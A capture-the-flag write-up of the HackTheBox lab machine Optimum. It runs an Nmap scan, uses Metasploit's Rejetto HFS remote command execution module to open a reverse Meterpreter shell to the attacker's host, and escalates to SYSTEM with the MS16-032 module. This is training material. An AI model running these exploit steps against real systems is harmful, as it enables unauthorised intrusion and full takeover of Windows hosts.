HackTheBox: Optimum

My first step was to run Nmap and discover services running on the host.

# Nmap 7.80 scan initiated Thu Sep  3 13:38:37 2020 as: nmap -p- -oN scan -sV -O -sC 10.10.10.8
Nmap scan report for 10.10.10.8
Host is up (0.020s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep  3 13:40:37 2020 -- 1 IP address (1 host up) scanned in 119.97 seconds

We can see from this output that only port 80 is open, and it is running the HttpFileServer software. By browsing to this page we can see that it is running version 2.3.

I then opened searchsploit and searched for any exploits with this software.

kali@kali:~/Documents/optimum$ searchsploit rejetto
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)                                                                                                                                   | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities                                                                                                                                        | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                                                                                                                                           | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                                                                                                                      | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                                                                                                                      | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                                                                                                                                 | windows/webapps/34852.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

There are multiple choices for version 2.3 I started with the top one on the list. I opened metasploit searched for the exploit within that and set it as the exploit.

msf5 > search rejetto

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


msf5 > use exploit/windows/http/rejetto_hfs_exec

I then set the necessary options to allow the exploit to function in my environment, then ran the exploit.

msf5 exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8
rhost => 10.10.10.8
msf5 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.10.14.29
lhost => 10.10.14.29
msf5 exploit(windows/http/rejetto_hfs_exec) > set srvhost 10.10.14.29
srvhost => 10.10.14.29
msf5 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.14.29:4444 
[*] Using URL: http://10.10.14.29:8080/iy4yuO6
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /pGt1jOpl
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.29:4444 -> 10.10.10.8:49162) at 2020-09-03 14:22:39 -0400
[!] Tried to delete %TEMP%\ZLZvmxLcClMgg.vbs, unknown result

[*] Server stopped.

meterpreter > 
meterpreter > ls
Listing: C:\Users\kostas\Desktop
================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2020-09-09 23:22:48 -0400  %TEMP%
100666/rw-rw-rw-  282     fil   2017-03-18 07:57:16 -0400  desktop.ini
100777/rwxrwxrwx  760320  fil   2014-02-16 06:58:52 -0500  hfs.exe
100444/r--r--r--  32      fil   2017-03-18 08:13:18 -0400  user.txt.txt
meterpreter > cat user.txt.txt 
[REDACTED]
meterpreter > 

As you can see from the output. This ran successfully and spawned a meterpreter shell. I was able from here to read the user flag.

I noticed when running sysinfo that the architecture was x64 and the payload i used was 32 bit. I decided to set the payload to x64 reverse_TCP to allow for a working privilage esclation.

msf5 exploit(windows/http/rejetto_hfs_exec) > set payload windows/x64/meterpreter_reverse_tcp

The next step was to upload SHERLOCK to the machine and execute it to identify possible privilege exploitation methods.

meterpreter > upload /home/kali/Documents/optimum/Sherlock.ps1
[*] uploading  : /home/kali/Documents/optimum/Sherlock.ps1 -> Sherlock.ps1
[*] Uploaded 16.27 KiB of 16.27 KiB (100.0%): /home/kali/Documents/optimum/Sherlock.ps1 -> Sherlock.ps1
[*] uploaded   : /home/kali/Documents/optimum/Sherlock.ps1 -> Sherlock.ps1
meterpreter > powershell_import ./Sherlock.ps1
[+] File successfully imported. No result was returned.

meterpreter > powershell_execute Find-AllVulns
[+] Command execution completed:


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title      : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID      : 2017-7199
Link       : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable

As you can see from the output. There are multiple findings stating as being vulnerable. After some trial and error i discovered the MS16-032 exploit successfully run on the machine.

msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows x86
   1   Windows x64


msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set target 1
target => 1
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 10.10.14.16:5424 
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\XmayKNpxaWdDp.ps1...
[*] Compressing script contents...
[+] Compressed size: 3600
[*] Executing exploit script...
[*] Sending stage (176195 bytes) to 10.10.10.8
         __ __ ___ ___   ___     ___ ___ ___ 
        |  V  |  _|_  | |  _|___|   |_  |_  |
        |     |_  |_| |_| . |___| | |_  |  _|
        |_|_|_|___|_____|___|   |___|___|___|
                                            
                       [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1356

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 1352
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

1QbOGFFhI9x1Fbi003Q7cjj9ylu5wbjY
[+] Executed on target machine.
[*] Meterpreter session 11 opened (10.10.14.16:5424 -> 10.10.10.8:49163) at 2020-09-14 15:32:59 -0400
[+] Deleted C:\Users\kostas\AppData\Local\Temp\XmayKNpxaWdDp.ps1

From this point, I was able to browse to the Desktop folder under Administrator and cat the root flag.

meterpreter > cd /
meterpreter > cd Users 
meterpreter > cd Administrator
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-18 07:52:56 -0400  desktop.ini
100444/r--r--r--  32    fil   2017-03-18 08:13:57 -0400  root.txt

meterpreter > cat root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *